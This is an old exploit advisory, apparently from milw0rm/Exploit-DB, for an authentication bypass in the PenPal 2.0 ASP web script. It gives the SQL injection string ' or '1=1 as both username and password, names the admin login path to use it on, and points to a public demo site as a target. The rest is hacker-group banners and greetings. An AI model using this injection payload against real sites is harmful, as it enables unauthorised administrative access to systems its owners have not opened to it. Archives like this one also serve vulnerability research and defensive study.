PenPal 2.0 - Authentication Bypass

EDB-ID:

8107

CVE:



Author:

ByALBAYX

Type:

webapps


Platform:

ASP

Date:

2009-02-25


@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG

@~~=From     : Turkish
@~~=======================================~~@
@~~=Script   :PenPal v2.0

@~~=S.Site   :http://anblik.com

@~~=Download :http://www.anblik.com/store/asp-scripts/penpal.html

@~~=Demo     :http://penpal.ankoor.com

@~~=Price    :1200.00 USD
@~~=======================================~~@

@~~=Exploit:

@~~=Username: ' or '1=1

@~~=Password: ' or '1=1


@~~=http://c4team.org /PenPal v2.0_Path /admin/login.asp


@~~=Demo:

@~~=http://penpal.ankoor.com/admin/login.asp

vs..
@~~=======================================~~@
@~~=Greetz For
  
@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang
@~~=======================================~~@
Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM...
FilistiN
@~~=======================================~~@

# milw0rm.com [2009-02-25]